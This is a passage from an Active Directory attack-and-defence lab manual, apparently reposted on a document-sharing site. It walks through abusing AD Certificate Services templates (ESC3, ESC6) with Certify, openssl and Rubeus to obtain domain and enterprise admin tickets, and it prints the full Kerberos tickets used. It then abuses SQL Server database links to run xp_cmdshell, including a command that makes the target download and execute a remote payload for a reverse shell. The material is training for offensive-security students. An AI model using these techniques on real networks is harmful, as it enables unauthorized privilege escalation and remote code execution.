BS+7XgE2n4TS/bLQAST+njZnsG2TBO08JvNLWithRtGD8EicwG45RXU5TFKl5g+XN
xeIhwbmNCG62YC7EWCUxupUbKci2VmEIx3RugaeZjHFx9P+jdqLHjxcitl0ag0BW2
F+whFLkGLccn1imW6oXI1kGDHI/fcdKIPDjOZ6A51RflMWFRhlpmLTbNEVieQmY/t
unaVFamuyqKyqngw4xfwngA0d6EtCZrHn8661sQot7HzKvNmX5HL6bEoUZizzI7s5
TdRYp+xdqj55TV7e52CE/7G1RVN0eM/MLWYUl9YsH8A/Zkx+AJMyj7RKWw65SU9EG
mA3Y6TuLUotuMyYX+9nixNFiCfgbXsubIMDcvJ/9lFrqC5E5QNd51PHrMq75acGD6
l+qbKJX2k4qd+3EzFArwouQdHBInsgAmWAw6hrbgZlQfBV0om6o2o60BIcxxa0hSe
VztuEPimduhFD+X2I5i8X1kYD1YQKZYocvrFemHlaT2iGgcpqcx561JKQ0gUWtKME
aXkj7y0E6EfU/j3TEoXpxZD3BBeKBgrtznZ8yN5JrIDDL+uw9vIhqb6l1edEs3pkE
OodMfgOdP5LYYiFSi3c6ofvzPukyk87n+5ttBy62eiAfmImQzA2FG7w86Ceff48np
NNkafnY+eHlZbpwpX0Kg6B6R54/7PRWz6jDaswXaIufG/IzxjqyVcYV4Drsvv523A
AlteredSecurity Attacking and Defending Active Directory 202
zz82JS1q1UhHda+Cyog7Qrv3pEQNPVBYJ/GCMXZMg1tmhFTi1FT/AwuF2SHfPkFee
enNM9/+CReECbWarJtHyGhWRP2ru7od8HQCiQSJmyjT1QP2eArYu/SqHSWcra9bOn
DMzXW8/8teO3GeESBwaH0/PfBfoMns5iO/maMiyJt8FBz9gs6BRVr2m1HjcwSUBwE
HT12OqX9ge+saX7P05OFIYdW9piwN+0x/f3rwUk5vbfe1D1o4HkMIHhoAMCAQCigd
kEgdZ9gdMwgdCggc0wgcowgcegGzAZoAMCARehEgQQdtbrXGMyetImzligBbWuu6E
RGw9NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcD
BQBA4QAApREYDzIwMjMwMzIwMTg1NzM0WqYRGA8yMDIzMDMyMTA0NTczNFqnERgPM
jAyMzAzMjcxODU3MzRaqBEbD01PTkVZQ09SUC5MT0NBTKkkMCKgAwIBAqEbMBkbBm
tyYnRndBsPbW9uZXljb3JwLmxvY2Fs
AlteredSecurity Attacking and Defending Active Directory 203
Let us try to access the mcorp-dc to confirm our privileges!
• Command
ls \\mcorp-dc.moneycorp.local\c$
Awesome! We have EA privileges!
Privilege Escalation to DA and EA using ESC3
If we list vulnerable templates in moneycorp, we get the following result. We will use Certify.exe
tool. We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "find /vulnerable" . But before running the above command we need to
run RevertToSelf.
AlteredSecurity Attacking and Defending Active Directory 204
AlteredSecurity Attacking and Defending Active Directory 205
The "SmartCardEnrollment-Agent" template has EKU for Certificate Request Agent and
grants enrollment rights to Domain users. If we can find another template that has an EKU
that allows for domain authentication and has application policy requirement of certificate
request agent, we can request certificate on behalf of any user. We can follow the above
steps to run the built-in Assembly task and by modifying the parameters field to "find" .
AlteredSecurity Attacking and Defending Active Directory 206
Sweet! Now, request an Enrollment Agent Certificate from the template
"SmartCardEnrollment-Agent". We can follow the above steps to run the built-in Assembly
task and by modifying the parameters field to "request /ca:mcorp-
dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent" .
Like earlier, save the certificate text to cert.pem and convert to .pfx. Let us keep using
SecretPass@123 as the export password.
Note: Remove the blank lines while trying to save the output to cert.pem file.
• Command
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced
Cryptographic Provider v1.0" -export -out esc3-agent.pfx
AlteredSecurity Attacking and Defending Active Directory 207
Now we can use the Enrollment Agent Certificate to request a certificate for DA from the template
SmartCardEnrollment-Users.
First, we need to Upload the Certificate on the student VM.
• Command
Upload C:\AD\Tools\esc3-agent.pfx
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator
/enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123" .
AlteredSecurity Attacking and Defending Active Directory 208
Once again, save the certificate text to cert.pem and convert the .pem to .pfx. Still using
SecretPass@123 as the export password.
Note: Remove the blank lines while trying to save the output to cert.pem file.
• Command
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced
Cryptographic Provider v1.0" -export -out esc3-DA.pfx
Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "asktgt /user:administrator /certificate:C:\AD\Tools\esc3-DA.pfx
/password:SecretPass@123".
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.
First, we need to Upload the Certificate on the student VM.
• Command
Upload C:\AD\Tools\esc3-DA.pfx
AlteredSecurity Attacking and Defending Active Directory 209
AlteredSecurity Attacking and Defending Active Directory 210
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken administrator dollarcorp.moneycorp.local dummypassword
• Command
Rubeus ptt
/ticket:doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbG
kRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gx
pkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOCBWIwggVeoAMCARKhAwIBAqKCBVA
EggVMmxl6KexUUvE2lrYSvtBbYG3RXSdWHvCfCgXKLwhafxwyH7VlaZGAKWSAK6rj
VttS4FzhulrQ23Y+o1Y5XV1sy/xk/pCuxS44tBls6zoWopKbW+EpdafGRgNFAI2DU
bbW0wMTjTE3ZeWZy4jmaoLYH9p1H+62gMjX95VsgcwkNeqgulD3/c+QjMA0JX51ot
HaiGomQsm6JzJqQKVSD02g5QBByy8XcZAuS5a4Jjzm0v7U2OLOuex1XDHRdA6kgfG
qthfkQpic2cse++vTxppcREoO7Mt+cA1kZkXZA3gVib7D+3NjxQuwnpc6TzHGeuR9
yGn+lzR6m3GrFQ4w+l6vpYruOWoVU/l0oQsph9bev1ZJHz6dMSdWYGLqy7SH5IuUi
saA8moh5eEQJl6XnXJYSkKjjC7x2K45moekPGWA7MkeuF08YJH9Ln4j3fLb4BskoO
AlteredSecurity Attacking and Defending Active Directory 211
ETQ/bPHMY8pEOasvBTu3YBnLuXkxMr1qXbZ93XSXjq1uUdlDIQ4Nqux8zxeZjRPpw
b/xse/Dje2KAGTy0Va4EnWIUWlfFF4w0iHt/xl+zSRKDTsJkjHyU9FeJcT6Bc+amB
O5ozQHZLLLu4g4o9Ei0JpC9YepZ9iiIFaNNbuR2NI1DwfPyqlI0qTE8/P0FTvrj2J
R9z33SnYCkKyVrDIhNgucsE1rNLPnrETi8SQi2ktvahhqlQ0ROj9mPIDeDku69hFu
C9YWffILD9KDibYqT30yPWNJZ5qT9iYQ6hpZ5C41RP4nQAH9Ov0U70oca4EcvSjk+
t+ZQqeVpc4SfQQ1+BRdQE9HYEimPToa3p1QsIafuWJK11rIbdARr5JeTV8RoJzT4A
7LxA5vjOUIsCxCyYzhV9xXhOnZjHkdh+Qgbgkh9vli1iWB//huc3CXOfDbShyL4gg
JzqgXD8TyQWF05Axq/zm3PCz3/baFSWQzNMLqJ8BctTGTqlp5X/L3zJhrbi19rA4a
03bauyrbSyUXCrimtxiJ6iXm/xItIqLZtcNg1qStyyGrcuvCRbZIX7aL0uJY9/z/1
UcnjHxGahfWWnu5ESte2Ueqg3tHucOIz3FVtIBiiPcP5bpuhQQ4rFFxMFVAzTjLzf
Mq2MGJr/3ZsN2cnu9H4Ist7oa7x1q43MoPcvR/1ozd13BSWv3CBgs1+5SsiKdqF6T
W13BSqOh9GLM3eKFw7nPtkaDJPFLssAzLe7NP3yQ859KkpdDZI/1G/3Udwiui1hyX
NVDYlLB0ds+LR3nuVApV4JI3zUIkR1S8amqzCzlYG08dXPwhANXCg0GilD1dC3USa
iafijzDOfz8KOPklgJu9hsmxl2/tikX47oWx1j7kUcubRkud2y5TkJQo9tvE13o2a
uURUIf5DF8CeqCfmk71SFPsohxOQLFPu4NCfMdf4fdlpfBzSK4eBnA24l9h7WDIeS
QsV7xDntq+H1aWQTY+yYYcB02IdAY6dSakuqRYag6E4OGawQwYwdPeNHfC5jcKVof
TQacrKEv60hNedDHnmGlkS05gQXyv6fKtrikjSnSxcpqcnrvbZ26k4uSIlfG4A2Y4
HdTiI7mmbsl2m+TG98aXS/rH1MaB7NPb5UNGHgVeb+awVDBFXrZbm7FCib9NOgIt+
XA1Tq6zSb7i86jcMdNpCa5AmNMgRXGGa9otsDActJcQttn846LRPXKsr+Ign7ZYBY
SBhtVNjS7ImusPz0i78uPDUoBvtkcr1uUZ3ggnIT5wQXPqciAnru/MPYG2ImdCBIo
QrKHbQlBpNjwmfwj8IvXJ/2Hu+RjQwQcXZPj+Je9W2XZFq6fj9bfwpLO0So4IBBjC
CAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KAbMBmgAwIBF6ESBBBMWC4B5S2d
cHvXnkrj7umxoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBo
REwDxsNYWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDIzMDMyMDE5MzgzMVqmER
gPMjAyMzAzMjEwNTM4MzFapxEYDzIwMjMwMzI3MTkzODMxWqgcGxpET0xMQVJDT1J
QLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29y
cC5tb25leWNvcnAubG9jYWw=
AlteredSecurity Attacking and Defending Active Directory 212
Let us check if we have the DA privileges now.
• Command
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
To escalate to Enterprise Admin, we just need to make changes to request to the
SmartCardEnrollment-Users template and Rubeus.
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator
/enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123". But before running
the above command we need to run RevertToSelf.
AlteredSecurity Attacking and Defending Active Directory 213
Once again, save the certificate text to cert.pem and convert the. pem to .pfx. Still using
SecretPass@123 as the export password.
Note: Remove the blank lines while trying to save the output to cert.pem file.
• Command
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced
Cryptographic Provider v1.0" -export -out esc3-EA.pfx
Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "asktgt /user:moneycorp.local\administrator
/certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.moneycorp.local
/password:SecretPass@123".
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.
AlteredSecurity Attacking and Defending Active Directory 214
First, we need to Upload the Certificate on the student VM.
• Command
Upload C:\AD\Tools\esc3-EA.pfx
AlteredSecurity Attacking and Defending Active Directory 215
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken administrator moneycorp.local dummypassword
• Command
Rubeus ptt
/ticket:doIGhjCCBoKgAwIBBaEDAgEWooIFjTCCBYlhggWFMIIFgaADAgEFoREbD
01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPbW9uZXljb3JwLm
xvY2Fso4IFPzCCBTugAwIBEqEDAgECooIFLQSCBSkv5pMNkRo40NF0GF3ug+qFoPu
qMSerEdmRIEswRNq11Mj6GTLPUa76HKzj1p54m1+h5vyl4ICCk8aeYBM2WfRjcUHm
rHCYiDh2t2vwvr2SreeYsWn6WoM+MvjXSpywG/KQXy2S1OdPEPx9XD0MrM3Ko1bCS
zDn6YzDSagYtm9Ii4gBPljrdJAS+Zshch/4yYerB9mjs3AxSIuRfLA+o7DmmX6QC/
pIy/5tNRtzzmExJfY0w3AqvUUx/WvY2KwKeaDvbNiJzWKukPrifMAMw8Py3gP4RdU
0WWZrDemC/2ACNx9X6/ZkCmOSTIB5tDAIq3AzaIEUpFp2ZS4MiM16jdGmEW4m9cKR
Lrb0KBoMuyjV83XMOL3smJDfFLtxdtxDk9vEUgNeftK9xDwrV5JdFMCPV+ATKgQnp
S0T7cf9Rcgoeew6oZ/CUuTnVq+2xmDxpKDbUYiQg+nTyccdzX/bT1JF8W37HrzH8W
5dNSS1juV01UtHjY/LAMJZLmu9FBMiTcGmwkXPkJNwV+KRvgz2ZZ6lIDuHOJfOxDw
AlteredSecurity Attacking and Defending Active Directory 216
CHNZQ70D/s1kLw6kw2Zi9jxF+uJsCaJ9E0S4xfUDQX1QnijUKGK/0VNQxmhrB+tju
0knHzOTO0fuNgCZO1648/1HHBITUKhEJ2MvRXeG9MXSJ4wUaMnxszRTlO553wMXSu
DRGcypbBJYtCnEy1ONNy8+q8cW49us57DG8Xkdl3rktNV15M2tT48rvqedSOvdKHE
qCL5e39gQT1a/lKkUr7Ks/Q+KyA3AJEsJJbunvwhm00j75RE9+nrqck66lX7oqeWI
HyNdldh7yVxP9VIklqT+k376vZ5dS57U3LTKUz0V6TStG8DitDNVyjggo1AlEwMNi
HNjb+PjQb/dCDEFahgAAEMYiQ5iLPctZzcDs/bvWpZr7g4OaWkUZaqtitd90NPzOU
6z2ORCVVG2rsnZQ5mxtqjQv+Q+/xSehE2BytyZy+Kl+lZmCEjsfDDVdwC8e7WEPQ5
7VUoQ87G5BLE37Pz7edBPfi8scMFg9q8XKdWObOW3bOmCBi08DkX7vsi4hyrlsTO2
ileiPcri/RylMpbd9K+ClVFbKzfXN+NxWozSCGUIiLXoEyAmhEs2DSMFUK9XC8eH3
27owHT4KpPyds/9sc64+E3ykSiCMi5lNCoFKjJo1zD4MB269pqsXCVHSShjXD+ocA
qktByx0/XYvRmMXm1cbtpS13YDKApUuA+idM22an64Omm5fciOI+3pcjz2gyNlJ+n
+5u7QvKaUGX1GLgA3kYwnTAUKllcxCYnXZy3ql+NqqKJqy/2SjXlrAk7XgyoDK9wD
pktfCAdNFzf1WNNyk+LybdT1gs1KIkJW/J2IJHW1z8trLv0Jph1MtwRzy2emyVk+2
oIn39Evcln9pJcFzFfq1e0O7nA12/aMzpmXbJnPufJsV65d39DkEliKBeo1cHzKKg
NmKAsW/WMZ7lFH3MQkQQ/9Aueoua0rsUx2Vl5ZJQs67VahShvEOjY4P67srySPPbE
vmicCv8o1/Ne+Q0nR/ALlnwaCaU6/Qjozr5XTuFjAn4w1wfm37ggwYlygKNmxu6hU
tBakHX+0tIZbs/e5N2YtBz8huJbP9+jBiCT4pByoZiSY4T/q0N78TjUc06IlKKk4x
H6slkyNoDPRAII8WGoMfE8ospmdnZbiB3x1rG9n/91rovDQrOjJjc6jUnUEero0vw
7iZAYkBy9G6BAdiaThQgEgSi3GHxaYCPjVF6aBoFuMo1nGEo4HkMIHhoAMCAQCigd
kEgdZ9gdMwgdCggc0wgcowgcegGzAZoAMCARehEgQQYG1vIO1Tg28EiNAQAZ2L7aE
RGw9NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcD
BQBA4QAApREYDzIwMjMwMzIwMTk1ODAwWqYRGA8yMDIzMDMyMTA1NTgwMFqnERgPM
jAyMzAzMjcxOTU4MDBaqBEbD01PTkVZQ09SUC5MT0NBTKkkMCKgAwIBAqEbMBkbBm
tyYnRndBsPbW9uZXljb3JwLmxvY2Fs
AlteredSecurity Attacking and Defending Active Directory 217
Finally, let us access mcorp-dc!
• Command
ls \\mcorp-dc.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 218
Privilege Escalation to DA and EA using ESC6
The CA in moneycorp has EDITF_ATTRIBUTESUBJECTALTNAME2 flag set.
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "cas". But before running the above command we need to run
RevertToSelf.
AlteredSecurity Attacking and Defending Active Directory 219
This means that we can request a certificate for ANY user from a template that allow
enrollment for normal/low-privileged users.
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "find".
Sweet! As a member of RDPUsers group, we can request a certificate for any user using CA-
Integration template. Let us do it for DA. Use "/altname:moneycorp.local\administrator" in
the below command for escalation to EA.
AlteredSecurity Attacking and Defending Active Directory 220
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:CA-Integration /altname:administrator".
Once again, save the certificate text to cert.pem and convert the .pem to .pfx. Still using
SecretPass@123 as the export password.
Note: Remove the blank lines while trying to save the output to cert.pem file.
• Command
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced
Cryptographic Provider v1.0" -export -out esc6-DA.pfx
Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "asktgt /user:administrator /certificate:C:\AD\Tools\esc6-DA.pfx
/password:SecretPass@123".
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.
AlteredSecurity Attacking and Defending Active Directory 221
First, we need to Upload the Certificate on the student VM.
• Command
Upload C:\AD\Tools\esc6-DA.pfx
AlteredSecurity Attacking and Defending Active Directory 222
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken administrator dollarcorp.moneycorp.local dummypassword
• Command
Rubeus ptt
/ticket:doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbG
kRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gx
pkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOCBWIwggVeoAMCARKhAwIBAqKCBVA
EggVMup2TdrgQUjV0bhCazleEVwmKP+DCyR+AEf5/DSV8CIe1EU7q0b25YH5rMXmJ
+cdQTejC83b9Wx+R9XGZnKbpfZa5oq3UKCOVHoLPgGv6S2ck+GICmU2sZ0/248g4D
96LOCNmy/sFGBR9+UTTWGB0hL0A140uXQeX953/zK+IlhbpiFYE5tmld8vfG8QLDT
AqCJdzWEojbqocr6qXd5gdDHEqj6/WkcwaxDQV4k1LHC1KcrSnnrMLSWUEJrJj1l0
c0GNQya3JzQ7xIU22EuMwTNiXpV24ZCleHPcClpxNrxFyJT3rt1VEQRymRqOLbE3f
hyRklsAC1tvwAq53wKLaxv99rtB4sVzYz3q73Gi2VeOQGCxNv+CDnOZAB9oOUAZfb
AlteredSecurity Attacking and Defending Active Directory 223
IG5ZvhI7lIfZi7EwApMsv/SPW49OtmQnnWtLpvYkofPIaenExApvhAxXWeClTAlOC
LNas4iNN1gTEQYjvZtRTSeqfAY54z/CCblzpwGo+/CfX3bNgwVE3xFC0cq4in85Jd
22muV3LrtwubnC5pVts28JPBisBQKauWhT5uX+TLGSC+LtYsDkoWo02O2pxfXvXuN
BDzw0Dlo586cqjJiAGQn7N17bCr1oIJO8rTzCYSCBADLk9BCHbqbA4cnK9Y23CpWR
vjLqU2TWnBEexAbsLNkc8ZUFgOcdt4k+/BuWN25HqQa5SqQfkYpjA07wxNVTZZ9wy
3kbF68JUPXbqqzssgTwGiX56Ny8s0NoT+5Lj7+HFSNDiT46Q7y7gI6nAyTrDIYC0c
yOZYNHqYo9FVXoNnDUIzI33RQAZRYAg51SpTc86eiAIUgzPahPKJMO+8n3jc1gL7E
HUZQ9fVC+jZWxluqDNCuxiE3YiBCit7eVeHBGikCA1oKLi5UT7jmeTBa4jBXmkQCY
QKMcyrfcXUd/fQygITT8cKiDsLUcY2P8OrIwsvAoL96QzxjDxf0ptDir+DXrxo6CF
GOu9e8qQlM4Hsr2DUFHOW3fvqgdq3bjXpeXyrv0ENIQq5NDsc4sE6IB7w7suE7vqc
//6E9smN837j4TdVFWUOI/HKTPprOgIYlyWR0unJJf9K77YcA2+H8rJTSe0+dkER9
j5mQkuE00ifpz7mI7j6ogND84sG6WEJiaJJFT/jb7S/pJDqkRZXip4pNnz7ad4cKR
s9jGHPDWr/uknBTLEoBhsy57UkwnJpocnL5qX2PQkB3j/SHZs2ZpX+jwzI8CYzKG1
pWHloJiio0rF3w2ktyF37SZTnqjG0rOujt/VI804RRsRvnpCOrcCNEm/QJVAbIfP9
hLDYRGsYGnqvYFJHR0Mfphw5TBoPCySUjtSbJib+0yo4ntaMV3gHaCEclKfg075v/
sjfVk0Mr2iKJZitmy26CqYZBXOCnfogDYp5WNiQZJ7Jfw7VTE4//dQBkkGHFv20vB
EdwFEDPlAVrd34gFeZYHuD3a1qXoQNGXNxyKNkteJNVZpOvYA/RqShhvc0W0OlXKK
mh2JKcdemo0airN5EsqupaWUfT24FUoVA5NIZgqNFptPnRizHTe0ZyENRiKkA7zb4
KYSPs4EQAuEkRGR/zF0uSZ5ZcCl0KpSBS/VwzjYt8iCz0EZ+vl70WM0stmbBpCy3P
6Be41mgt41BSCMYhSbL472NuoTPzclaFltkt2HNKewTuTLhYxcvEU4BdrGMHB2DcY
k1c9YXCN8SZkGskH3wOqCJ53sYthiPaiICuBpJEv0Lg1ospFbZQxSHq8wD0iElpVT
f40BfdjTwV7UhBYg4081HjAId51FIcM1G0kuEy1dw8w0QT1n464gipVf3fo4IBBjC
CAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KAbMBmgAwIBF6ESBBCdfBI7jxBx
3o9fNz960mozoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBo
REwDxsNYWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDIzMDMyMDIwNDIzNFqmER
gPMjAyMzAzMjEwNjQyMzRapxEYDzIwMjMwMzI3MjA0MjM0WqgcGxpET0xMQVJDT1J
QLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29y
cC5tb25leWNvcnAubG9jYWw=
Finally, let us access dcorp-dc!
• Command
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 224
AlteredSecurity Attacking and Defending Active Directory 225
Learning Objective 22
Task
• Get a reverse shell on a SQL server in eurocorp forest by abusing database links from
dcorp-mssql.
Solution
Task - Get a reverse shell on a SQL server in eurocorp forest by abusing
database links from dcorp-mssql.
Let us start with enumerating SQL servers in the domain and if studentx has privileges to
connect to any of them. We can use PowerUpSQL module for enumeration. We will need to
import the PowerUpSQL.ps1 PowerShell script using PowerShellImport built-in task in
covenant. But before running the above command we need to run RevertToSelf.
Note: In case we face issues while enumerating the MSSQL instance we can leverage
MakeToken to create a new token with student privileges and execute the commands
again.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 226
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the PowerUpSQL.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 227
• Command
PowerShell Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
We will now use Get-SQLServerLinkCrawl for crawling the database links automatically
• Command
PowerShell Get-SQLServerLinkCrawl -Instance dcorp-
mssql.dollarcorp.moneycorp.local -Verbose
AlteredSecurity Attacking and Defending Active Directory 228
AlteredSecurity Attacking and Defending Active Directory 229
Sweet! We have sysadmin on eu-sql server!
If xp_cmdshell is enabled (or RPC out is true, which is set to false in this case), it is possible
to execute commands on eu-sql using linked databases. To avoid dealing with multiple
quotes and escapes, we can use the following command
• Command
PowerShell Get-SQLServerLinkCrawl -Instance dcorp-
mssql.dollarcorp.moneycorp.local -Query "exec
master..xp_cmdshell 'whoami'"
AlteredSecurity Attacking and Defending Active Directory 230
Let us try to gain access to the machine using PowerShell grunt.
• Command
PowerShell Get-SQLServerLinkCrawl -Instance dcorp-
mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell
'powershell -c IEX (iwr -UseBasicParsing
http://172.16.100.2/StudentVMGrunt.ps1)'" -QueryTarget eu-sql
AlteredSecurity Attacking and Defending Active Directory 231
You might also like
- The Rough Guide To Working For: Operating On Ryanair AircraftNo ratings yetThe Rough Guide To Working For: Operating On Ryanair Aircraft46 pages
- Implementing DevSecOps with Docker and Kubernetes: An Experiential Guide to Operate in the DevOps Environment for Securing and Monitoring Container ApplicationsFrom EverandImplementing DevSecOps with Docker and Kubernetes: An Experiential Guide to Operate in the DevOps Environment for Securing and Monitoring Container ApplicationsNo ratings yet
- Hands-On Microservices with Kubernetes: Build, deploy, and manage scalable microservices on KubernetesFrom EverandHands-On Microservices with Kubernetes: Build, deploy, and manage scalable microservices on Kubernetes5/5 (1)
- Kubernetes: Build and Deploy Modern Applications in a Scalable Infrastructure. The Complete Guide to the Most Modern Scalable Software Infrastructure.: Docker & Kubernetes, #2From EverandKubernetes: Build and Deploy Modern Applications in a Scalable Infrastructure. The Complete Guide to the Most Modern Scalable Software Infrastructure.: Docker & Kubernetes, #2No ratings yet
- Software Containers: The Complete Guide to Virtualization Technology. Create, Use and Deploy Scalable Software with Docker and Kubernetes. Includes Docker and Kubernetes.From EverandSoftware Containers: The Complete Guide to Virtualization Technology. Create, Use and Deploy Scalable Software with Docker and Kubernetes. Includes Docker and Kubernetes.No ratings yet
- Docker: The Complete Guide to the Most Widely Used Virtualization Technology. Create Containers and Deploy them to Production Safely and Securely.: Docker & Kubernetes, #1From EverandDocker: The Complete Guide to the Most Widely Used Virtualization Technology. Create Containers and Deploy them to Production Safely and Securely.: Docker & Kubernetes, #1No ratings yet
- Docker Tutorial for Beginners: Learn Programming, Containers, Data Structures, Software Engineering, and CodingFrom EverandDocker Tutorial for Beginners: Learn Programming, Containers, Data Structures, Software Engineering, and Coding3/5 (2)
- Advanced Multiplayer Game Development with Ureal Engine 5: A Comprehensive Guide to C++ ScriptingFrom EverandAdvanced Multiplayer Game Development with Ureal Engine 5: A Comprehensive Guide to C++ ScriptingNo ratings yet
- DevOps. How to build pipelines with Jenkins, Docker container, AWS ECS, JDK 11, git and maven 3?From EverandDevOps. How to build pipelines with Jenkins, Docker container, AWS ECS, JDK 11, git and maven 3?No ratings yet
- Evaluation of Some Cloud Based Virtual Private Server (VPS) ProvidersFrom EverandEvaluation of Some Cloud Based Virtual Private Server (VPS) ProvidersNo ratings yet
- Professional Node.js: Building Javascript Based Scalable SoftwareFrom EverandProfessional Node.js: Building Javascript Based Scalable SoftwareNo ratings yet
- DevOps and Containers Security: Security and Monitoring in Docker ContainersFrom EverandDevOps and Containers Security: Security and Monitoring in Docker ContainersNo ratings yet
- Docker Unveiled: The Comprehensive Handbook to Streamlined DevelopmentFrom EverandDocker Unveiled: The Comprehensive Handbook to Streamlined DevelopmentNo ratings yet
- Docker for Beginner: Practical Guide to Containerization MasteryFrom EverandDocker for Beginner: Practical Guide to Containerization MasteryNo ratings yet
- Docker Essentials: Simplifying Containerization: A Beginner's GuideFrom EverandDocker Essentials: Simplifying Containerization: A Beginner's GuideNo ratings yet
- Learn Kubernetes & Docker - .NET Core, Java, Node.JS, PHP or PythonFrom EverandLearn Kubernetes & Docker - .NET Core, Java, Node.JS, PHP or PythonNo ratings yet
- JAVASCRIPT FRONT END PROGRAMMING: Crafting Dynamic and Interactive User Interfaces with JavaScript (2024 Guide for Beginners)From EverandJAVASCRIPT FRONT END PROGRAMMING: Crafting Dynamic and Interactive User Interfaces with JavaScript (2024 Guide for Beginners)No ratings yet
- TensorFlow Developer Certificate Exam Practice Tests 2024 Made EasyFrom EverandTensorFlow Developer Certificate Exam Practice Tests 2024 Made EasyNo ratings yet
- CMake Best Practices: Upgrade your C++ builds with CMake for maximum efficiency and scalabilityFrom EverandCMake Best Practices: Upgrade your C++ builds with CMake for maximum efficiency and scalabilityNo ratings yet
- Linux - a Secure Personal Computer for Beginners. Second EditionFrom EverandLinux - a Secure Personal Computer for Beginners. Second EditionNo ratings yet
- Exam AZ-800: Administering Windows Server Hybrid Core Infrastructure PreparationFrom EverandExam AZ-800: Administering Windows Server Hybrid Core Infrastructure PreparationNo ratings yet
- Linux Kernel Programming: A comprehensive and practical guide to kernel internals, writing modules, and kernel synchronizationFrom EverandLinux Kernel Programming: A comprehensive and practical guide to kernel internals, writing modules, and kernel synchronizationNo ratings yet
- Clang Compiler Frontend: Get to grips with the internals of a C/C++ compiler frontend and create your own toolsFrom EverandClang Compiler Frontend: Get to grips with the internals of a C/C++ compiler frontend and create your own toolsNo ratings yet
- Learn Kubernetes - Container orchestration using Docker: Learn CollectionFrom EverandLearn Kubernetes - Container orchestration using Docker: Learn Collection4/5 (1)
- Evaluation of Some Android Emulators and Installation of Android OS on Virtualbox and VMwareFrom EverandEvaluation of Some Android Emulators and Installation of Android OS on Virtualbox and VMwareNo ratings yet
- Docker Basics Explained Clearly: A Practical Guide with ExamplesFrom EverandDocker Basics Explained Clearly: A Practical Guide with ExamplesNo ratings yet
- Continuous Delivery with Docker and Jenkins - Second Edition: Create secure applications by building complete CI/CD pipelines, 2nd EditionFrom EverandContinuous Delivery with Docker and Jenkins - Second Edition: Create secure applications by building complete CI/CD pipelines, 2nd EditionNo ratings yet
